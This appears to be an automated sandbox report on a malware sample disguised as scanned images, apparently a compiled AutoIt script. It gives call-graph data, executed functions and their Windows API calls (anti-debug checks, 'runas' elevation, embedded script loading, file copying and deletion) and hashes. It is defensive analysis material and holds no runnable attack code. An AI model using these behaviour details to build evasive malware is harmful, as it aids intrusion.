a281a7 59 API calls 101235->101242 101236->101235 101237->101228 101238 a5d9dd 101237->101238 101249 a5d95b 101237->101249 101238->101228 101245 a5d9c8 101238->101245 101243 a281a7 59 API calls 101239->101243 101252 a2481f Mailbox 101239->101252 101240->101241 101241->101226 101242->101239 101243->101252 101244 a27b52 59 API calls 101244->101250 101248 a27d2c 59 API calls 101245->101248 101246 a5d9b9 101247 a27d2c 59 API calls 101246->101247 101247->101250 101248->101250 101249->101246 101253 a5d9a4 101249->101253 101250->101241 101250->101244 101276 a27a84 59 API calls 2 library calls 101250->101276 101252->101110 101254 a27d2c 59 API calls 101253->101254 101254->101250 101255->101157 101256->101157 101257->101157 101258->101157 101259->101157 101260->101157 101261->101157 101263 a25de8 101262->101263 101264 a25dd9 101262->101264 101263->101264 101265 a25ded CloseHandle 101263->101265 101264->101136 101265->101264 101266->101081 101267->101087 101268->101115 101269->101163 101270->101163 101271->101139 101272->101142 101273->101165 101274->101144 101275->101149 101276->101250 101278 a26ef5 101277->101278 101279 a27009 101277->101279 101278->101279 101280 a40ff6 Mailbox 59 API calls 101278->101280 101279->100047 101282 a26f1c 101280->101282 101281 a40ff6 Mailbox 59 API calls 101287 a26f91 101281->101287 101282->101281 101284 a274bd 59 API calls 101284->101287 101286 a2766f 59 API calls 101286->101287 101287->101279 101287->101284 101287->101286 101290 a263a0 94 API calls 2 library calls 101287->101290 101291 a76ac9 59 API calls Mailbox 101287->101291 101288->100050 101289->100052 101290->101287 101291->101287 101292->100065 101293->100066 101295 a2e5b1 101294->101295 101296 a2e59d 101294->101296 101374 a8a0b5 89 API calls 4 library calls 101295->101374 101373 a2e060 341 API calls 2 library calls 101296->101373 101298 a2e5a8 101298->100134 101300 a63ece 101300->101300 101302 a2e835 101301->101302 101303 a63ed3 101302->101303 101305 a2e89f 101302->101305 101315 a2e8f9 101302->101315 101304 a2a000 341 API calls 101303->101304 101306 a63ee8 101304->101306 101308 a277c7 59 API calls 101305->101308 101305->101315 101330 a2ead0 Mailbox 101306->101330 101376 a8a0b5 89 API calls 4 library calls 101306->101376 101307 a277c7 59 API calls 101307->101315 101310 a63f2e 101308->101310 101312 a42f80 __cinit 67 API calls 101310->101312 101311 a42f80 __cinit 67 API calls 101311->101315 101312->101315 101313 a63f50 101313->100134 101314 a28620 69 API calls 101314->101330 101315->101307 101315->101311 101315->101313 101318 a2eaba 101315->101318 101315->101330 101317 a8a0b5 89 API calls 101317->101330 101318->101330 101377 a8a0b5 89 API calls 4 library calls 101318->101377 101319 a28ea0 59 API calls 101319->101330 101320 a2a000 341 API calls 101320->101330 101322 a2f2f5 101381 a8a0b5 89 API calls 4 library calls 101322->101381 101325 a6424f 101325->100134 101330->101314 101330->101317 101330->101319 101330->101320 101330->101322 101331 a2ebd8 101330->101331 101375 a280d7 59 API calls 2 library calls 101330->101375 101378 a77405 59 API calls 101330->101378 101379 a9c8d7 341 API calls 101330->101379 101380 a9b851 341 API calls Mailbox 101330->101380 101382 a29df0 59 API calls Mailbox 101330->101382 101383 a996db 341 API calls Mailbox 101330->101383 101331->100134 101333 a2f7b0 101332->101333 101334 a2f61a 101332->101334 101337 a27f41 59 API calls 101333->101337 101335 a2f626 101334->101335 101336 a64848 101334->101336 101470 a2f3f0 341 API calls 2 library calls 101335->101470 101472 a9bf80 341 API calls Mailbox 101336->101472 101343 a2f6ec Mailbox 101337->101343 101340 a64856 101344 a2f790 101340->101344 101473 a8a0b5 89 API calls 4 library calls 101340->101473 101342 a2f65d 101342->101340 101342->101343 101342->101344 101348 a24faa 84 API calls 101343->101348 101351 a9e237 130 API calls 101343->101351 101384 a9e24b 101343->101384 101387 a83e73 101343->101387 101390 a8cde5 101343->101390 101344->100134 101346 a2f743 101346->101344 101471 a29df0 59 API calls Mailbox 101346->101471 101348->101346 101351->101346 101352->100134 101353->100134 101354->100074 101355->100078 101356->100134 101357->100083 101358->100083 101359->100083 101360->100134 101361->100134 101362->100134 101363->100134 101364->100134 101365->100134 101366->100127 101367->100127 101368->100127 101369->100127 101370->100127 101371->100127 101372->100127 101373->101298 101374->101300 101375->101330 101376->101330 101377->101330 101378->101330 101379->101330 101380->101330 101381->101325 101382->101330 101383->101330 101385 a9cdf1 130 API calls 101384->101385 101386 a9e25b 101385->101386 101386->101346 101474 a84696 GetFileAttributesW 101387->101474 101391 a277c7 59 API calls 101390->101391 101392 a8ce1a 101391->101392 101393 a277c7 59 API calls 101392->101393 101394 a8ce23 101393->101394 101395 a8ce37 101394->101395 101587 a29c9c 59 API calls 101394->101587 101397 a29997 84 API calls 101395->101397 101398 a8ce54 101397->101398 101399 a8cf55 101398->101399 101400 a8ce76 101398->101400 101411 a8cf85 Mailbox 101398->101411 101402 a24f3d 136 API calls 101399->101402 101401 a29997 84 API calls 101400->101401 101403 a8ce82 101401->101403 101404 a8cf69 101402->101404 101406 a281a7 59 API calls 101403->101406 101405 a8cf81 101404->101405 101407 a24f3d 136 API calls 101404->101407 101408 a277c7 59 API calls 101405->101408 101405->101411 101409 a8ce8e 101406->101409 101407->101405 101410 a8cfb6 101408->101410 101413 a8cea2 101409->101413 101414 a8ced4 101409->101414 101412 a277c7 59 API calls 101410->101412 101411->101346 101415 a8cfbf 101412->101415 101416 a281a7 59 API calls 101413->101416 101417 a29997 84 API calls 101414->101417 101418 a277c7 59 API calls 101415->101418 101419 a8ceb2 101416->101419 101420 a8cee1 101417->101420 101421 a8cfc8 101418->101421 101422 a27e0b 59 API calls 101419->101422 101423 a281a7 59 API calls 101420->101423 101424 a277c7 59 API calls 101421->101424 101426 a8cebc 101422->101426 101427 a8ceed 101423->101427 101425 a8cfd1 101424->101425 101428 a29997 84 API calls 101425->101428 101429 a29997 84 API calls 101426->101429 101588 a84cd3 GetFileAttributesW 101427->101588 101432 a8cfde 101428->101432 101433 a8cec8 101429->101433 101431 a8cef6 101436 a27b52 59 API calls 101431->101436 101439 a8cf09 101431->101439 101434 a246f9 59 API calls 101432->101434 101435 a27c8e 59 API calls 101433->101435 101437 a8cff9 101434->101437 101435->101414 101436->101439 101440 a27b52 59 API calls 101437->101440 101438 a29997 84 API calls 101441 a8cf36 101438->101441 101439->101438 101445 a8cf0f 101439->101445 101442 a8d008 101440->101442 101589 a83a2b 75 API calls Mailbox 101441->101589 101445->101411 101470->101342 101471->101346 101472->101340 101473->101344 101475 a83e7a 101474->101475 101476 a846b1 FindFirstFileW 101474->101476 101475->101346 101476->101475 101477 a846c6 FindClose 101476->101477 101477->101475 101587->101395 101588->101431 101589->101445 101598 a21055 101603 a22649 101598->101603 101601 a42f80 __cinit 67 API calls 101602 a21064 101601->101602 101604 a277c7 59 API calls 101603->101604 101605 a226b7 101604->101605 101610 a23582 101605->101610 101608 a22754 101609 a2105a 101608->101609 101613 a23416 59 API calls 2 library calls 101608->101613 101609->101601 101614 a235b0 101610->101614 101613->101608 101615 a235a1 101614->101615 101616 a235bd 101614->101616 101615->101608 101616->101615 101617 a235c4 RegOpenKeyExW 101616->101617 101617->101615 101618 a235de RegQueryValueExW 101617->101618 101619 a23614 RegCloseKey 101618->101619 101620 a235ff 101618->101620 101619->101615 101620->101619 101621 16923b0 101635 1690000 101621->101635 101623 1692462 101638 16922a0 101623->101638 101641 1693490 GetPEB 101635->101641 101637 169068b 101637->101623 101639 16922a9 Sleep 101638->101639 101640 16922b7 101639->101640 101642 16934ba 101641->101642 101642->101637 101643 a2107d 101648 a271eb 101643->101648 101645 a2108c 101646 a42f80 __cinit 67 API calls 101645->101646 101647 a21096 101646->101647 101649 a271fb __write_nolock 101648->101649 101650 a277c7 59 API calls 101649->101650 101651 a272b1 101650->101651 101652 a24864 61 API calls 101651->101652 101653 a272ba 101652->101653 101679 a4074f 101653->101679 101656 a27e0b 59 API calls 101657 a272d3 101656->101657 101658 a23f84 59 API calls 101657->101658 101659 a272e2 101658->101659 101660 a277c7 59 API calls 101659->101660 101661 a272eb 101660->101661 101662 a27eec 59 API calls 101661->101662 101663 a272f4 RegOpenKeyExW 101662->101663 101664 a5ecda RegQueryValueExW 101663->101664 101668 a27316 Mailbox 101663->101668 101665 a5ecf7 101664->101665 101666 a5ed6c RegCloseKey 101664->101666 101667 a40ff6 Mailbox 59 API calls 101665->101667 101666->101668 101678 a5ed7e _wcscat Mailbox __NMSG_WRITE 101666->101678 101669 a5ed10 101667->101669 101668->101645 101670 a2538e 59 API calls 101669->101670 101671 a5ed1b RegQueryValueExW 101670->101671 101672 a5ed38 101671->101672 101675 a5ed52 101671->101675 101673 a27d2c 59 API calls 101672->101673 101673->101675 101674 a27b52 59 API calls 101674->101678 101675->101666 101676 a27f41 59 API calls 101676->101678 101677 a23f84 59 API calls 101677->101678 101678->101668 101678->101674 101678->101676 101678->101677 101680 a51b90 __write_nolock 101679->101680 101681 a4075c GetFullPathNameW 101680->101681 101682 a4077e 101681->101682 101683 a27d2c 59 API calls 101682->101683 101684 a272c5 101683->101684 101684->101656

                                                        Executed Functions

                                                        Function 00A23B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A23B7A
                                                        • IsDebuggerPresent.KERNEL32 ref: 00A23B8C
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE62F8,00AE62E0,?,?), ref: 00A23BFD
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A30A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A23C26,00AE62F8,?,?,?), ref: 00A30ACE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A23C81
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AD93F0,00000010), ref: 00A5D4BC
                                                        • SetCurrentDirectoryW.KERNEL32(?,00AE62F8,?,?,?), ref: 00A5D4F4
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AD5D40,00AE62F8,?,?,?), ref: 00A5D57A
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A5D581
                                                          • Part of subcall function 00A23A58: GetSysColorBrush.USER32(0000000F), ref: 00A23A62
                                                          • Part of subcall function 00A23A58: LoadCursorW.USER32(00000000,00007F00), ref: 00A23A71
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(00000063), ref: 00A23A88
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(000000A4), ref: 00A23A9A
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(000000A2), ref: 00A23AAC
                                                          • Part of subcall function 00A23A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A23AD2
                                                          • Part of subcall function 00A23A58: RegisterClassExW.USER32(?), ref: 00A23B28
                                                          • Part of subcall function 00A239E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A23A15
                                                          • Part of subcall function 00A239E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23A36
                                                          • Part of subcall function 00A239E7: ShowWindow.USER32(00000000,?,?), ref: 00A23A4A
                                                          • Part of subcall function 00A239E7: ShowWindow.USER32(00000000,?,?), ref: 00A23A53
                                                          • Part of subcall function 00A243DB: _memset.LIBCMT ref: 00A24401
                                                          • Part of subcall function 00A243DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A244A6
                                                        Strings
                                                        • runas, xrefs: 00A5D575
                                                        • This is a third-party compiled AutoIt script., xrefs: 00A5D4B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 46781cb24c21db465f1f94631a61d97e8c2317cd868e758cae949548c23b18e5
                                                        • Instruction ID: 8839341f7a09864a94b109c913bf896318e09bfeaf2199e4b24c09b3a3f6a5b3
                                                        • Opcode Fuzzy Hash: 46781cb24c21db465f1f94631a61d97e8c2317cd868e758cae949548c23b18e5
                                                        • Instruction Fuzzy Hash: 5A511531D08299AECF11EBF8ED45EFE7B78BF16340B004575F9116A1A1DA748A0ACB21
                                                        Function 00A24AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 996 a24afe-a24b5e call a277c7 GetVersionExW call a27d2c 1001 a24b64 996->1001 1002 a24c69-a24c6b 996->1002 1003 a24b67-a24b6c 1001->1003 1004 a5db90-a5db9c 1002->1004 1006 a24b72 1003->1006 1007 a24c70-a24c71 1003->1007 1005 a5db9d-a5dba1 1004->1005 1008 a5dba4-a5dbb0 1005->1008 1009 a5dba3 1005->1009 1010 a24b73-a24baa call a27e8c call a27886 1006->1010 1007->1010 1008->1005 1011 a5dbb2-a5dbb7 1008->1011 1009->1008 1019 a24bb0-a24bb1 1010->1019 1020 a5dc8d-a5dc90 1010->1020 1011->1003 1013 a5dbbd-a5dbc4 1011->1013 1013->1004 1015 a5dbc6 1013->1015 1018 a5dbcb-a5dbce 1015->1018 1021 a5dbd4-a5dbf2 1018->1021 1022 a24bf1-a24c08 GetCurrentProcess IsWow64Process 1018->1022 1019->1018 1023 a24bb7-a24bc2 1019->1023 1024 a5dc92 1020->1024 1025 a5dca9-a5dcad 1020->1025 1021->1022 1026 a5dbf8-a5dbfe 1021->1026 1032 a24c0a 1022->1032 1033 a24c0d-a24c1e 1022->1033 1027 a5dc13-a5dc19 1023->1027 1028 a24bc8-a24bca 1023->1028 1029 a5dc95 1024->1029 1030 a5dcaf-a5dcb8 1025->1030 1031 a5dc98-a5dca1 1025->1031 1036 a5dc00-a5dc03 1026->1036 1037 a5dc08-a5dc0e 1026->1037 1040 a5dc23-a5dc29 1027->1040 1041 a5dc1b-a5dc1e 1027->1041 1038 a24bd0-a24bd3 1028->1038 1039 a5dc2e-a5dc3a 1028->1039 1029->1031 1030->1029 1042 a5dcba-a5dcbd 1030->1042 1031->1025 1032->1033 1034 a24c20-a24c30 call a24c95 1033->1034 1035 a24c89-a24c93 GetSystemInfo 1033->1035 1053 a24c32-a24c3f call a24c95 1034->1053 1054 a24c7d-a24c87 GetSystemInfo 1034->1054 1048 a24c56-a24c66 1035->1048 1036->1022 1037->1022 1046 a24bd9-a24be8 1038->1046 1047 a5dc5a-a5dc5d 1038->1047 1043 a5dc44-a5dc4a 1039->1043 1044 a5dc3c-a5dc3f 1039->1044 1040->1022 1041->1022 1042->1031 1043->1022 1044->1022 1051 a5dc4f-a5dc55 1046->1051 1052 a24bee 1046->1052 1047->1022 1050 a5dc63-a5dc78 1047->1050 1055 a5dc82-a5dc88 1050->1055 1056 a5dc7a-a5dc7d 1050->1056 1051->1022 1052->1022 1061 a24c41-a24c45 GetNativeSystemInfo 1053->1061 1062 a24c76-a24c7b 1053->1062 1058 a24c47-a24c4b 1054->1058 1055->1022 1056->1022 1058->1048 1060 a24c4d-a24c50 FreeLibrary 1058->1060 1060->1048 1061->1058 1062->1061
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00A24B2B
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • GetCurrentProcess.KERNEL32(?,00AAFAEC,00000000,00000000,?), ref: 00A24BF8
                                                        • IsWow64Process.KERNEL32(00000000), ref: 00A24BFF
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A24C45
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A24C50
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00A24C81
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00A24C8D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: 969d68f08d42f616e3b94cf5492484324a25fa77b46b108c71c1c377a88dfe3f
                                                        • Instruction ID: 363b383440d0f4a67002115667d2e98b940206de680059b3ab70722f8f4f51f8
                                                        • Opcode Fuzzy Hash: 969d68f08d42f616e3b94cf5492484324a25fa77b46b108c71c1c377a88dfe3f
                                                        • Instruction Fuzzy Hash: E591C33154A7D0DEC732DB7C95511AABFF4BF2A301B444EADE4CA93A41D230E948C769
                                                        Function 00A24FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1063 a24fe9-a25001 CreateStreamOnHGlobal 1064 a25003-a2501a FindResourceExW 1063->1064 1065 a25021-a25026 1063->1065 1066 a25020 1064->1066 1067 a5dd5c-a5dd6b LoadResource 1064->1067 1066->1065 1067->1066 1068 a5dd71-a5dd7f SizeofResource 1067->1068 1068->1066 1069 a5dd85-a5dd90 LockResource 1068->1069 1069->1066 1070 a5dd96-a5ddb4 1069->1070 1070->1066
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A24EEE,?,?,00000000,00000000), ref: 00A24FF9
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A24EEE,?,?,00000000,00000000), ref: 00A25010
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F), ref: 00A5DD60
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F), ref: 00A5DD75
                                                        • LockResource.KERNEL32(00A24EEE,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F,00000000), ref: 00A5DD88
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: efa65e6714c0d656b2b8a80c3b13df5319acc05ed2028fcb0a9890e2e6d60e52
                                                        • Instruction ID: ba6626d6f213095279e1208e2b57008b218f824476d47bb922fd910f669a0922
                                                        • Opcode Fuzzy Hash: efa65e6714c0d656b2b8a80c3b13df5319acc05ed2028fcb0a9890e2e6d60e52
                                                        • Instruction Fuzzy Hash: 58118C75600701AFD7248BA9EC48FA77BB9FBCAB11F104168F405C62A0DB71EC058660
                                                        Function 00A84696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,00A5E7C1), ref: 00A846A6
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00A846B7
                                                        • FindClose.KERNEL32(00000000), ref: 00A846C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 1a5d0e19db821f25c96e91fcd8de394f95d1d476978f873846b5be1c08209198
                                                        • Instruction ID: 749b8a1839be7c62cdc80e520add8ab4dbde61a3f651bb8db459beca93708351
                                                        • Opcode Fuzzy Hash: 1a5d0e19db821f25c96e91fcd8de394f95d1d476978f873846b5be1c08209198
                                                        • Instruction Fuzzy Hash: DEE0D8314148025F4614B7B8EC4D4EA7B9C9E0B335F100725F835C10E0F7B05D548695
                                                        Function 00A2E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Variable must be of type 'Object'., xrefs: 00A6428C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable must be of type 'Object'.
                                                        • API String ID: 0-109567571
                                                        • Opcode ID: c1fa34582bf28924b08dc28939a42873c596736cd6e5a052cd68e0dbad303e8b
                                                        • Instruction ID: 77d9948c212f6443b11c80deb0493c4cd23fea38bc65888f224771d1b1e2daea
                                                        • Opcode Fuzzy Hash: c1fa34582bf28924b08dc28939a42873c596736cd6e5a052cd68e0dbad303e8b
                                                        • Instruction Fuzzy Hash: DAA28D75A04225CFCB24CF98E580AAEB7B1FF58300F648179E916AB351D735ED82CB91
                                                        Function 00A30B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A30BBB
                                                        • timeGetTime.WINMM ref: 00A30E76
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A30FB3
                                                        • TranslateMessage.USER32(?), ref: 00A30FC7
                                                        • DispatchMessageW.USER32(?), ref: 00A30FD5
                                                        • Sleep.KERNEL32(0000000A), ref: 00A30FDF
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00A3105A
                                                        • DestroyWindow.USER32 ref: 00A31066
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A31080
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00A652AD
                                                        • TranslateMessage.USER32(?), ref: 00A6608A
                                                        • DispatchMessageW.USER32(?), ref: 00A66098
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A660AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4003667617-3242690629
                                                        • Opcode ID: 550b47237aae281d2f1061e6d12b66890708f39f6d33e74bc573916bf4398789
                                                        • Instruction ID: abc80b31490738d5d5cfebee21aecf596b372c29c29b1b5dd0927ce817779159
                                                        • Opcode Fuzzy Hash: 550b47237aae281d2f1061e6d12b66890708f39f6d33e74bc573916bf4398789
                                                        • Instruction Fuzzy Hash: A6B2AE70A08741DFD728DF24C994BAAB7F5BF85304F14492DF58A872A1DB71E885CB82
                                                        Function 00A893DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00A891E9: __time64.LIBCMT ref: 00A891F3
                                                          • Part of subcall function 00A25045: _fseek.LIBCMT ref: 00A2505D
                                                        • __wsplitpath.LIBCMT ref: 00A894BE
                                                          • Part of subcall function 00A4432E: __wsplitpath_helper.LIBCMT ref: 00A4436E
                                                        • _wcscpy.LIBCMT ref: 00A894D1
                                                        • _wcscat.LIBCMT ref: 00A894E4
                                                        • __wsplitpath.LIBCMT ref: 00A89509
                                                        • _wcscat.LIBCMT ref: 00A8951F
                                                        • _wcscat.LIBCMT ref: 00A89532
                                                          • Part of subcall function 00A8922F: _memmove.LIBCMT ref: 00A89268
                                                          • Part of subcall function 00A8922F: _memmove.LIBCMT ref: 00A89277
                                                        • _wcscmp.LIBCMT ref: 00A89479
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AAE
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AC1
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A896DC
                                                        • _wcsncpy.LIBCMT ref: 00A8974F
                                                        • DeleteFileW.KERNEL32(?,?), ref: 00A89785
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A8979B
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A897AC
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A897BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
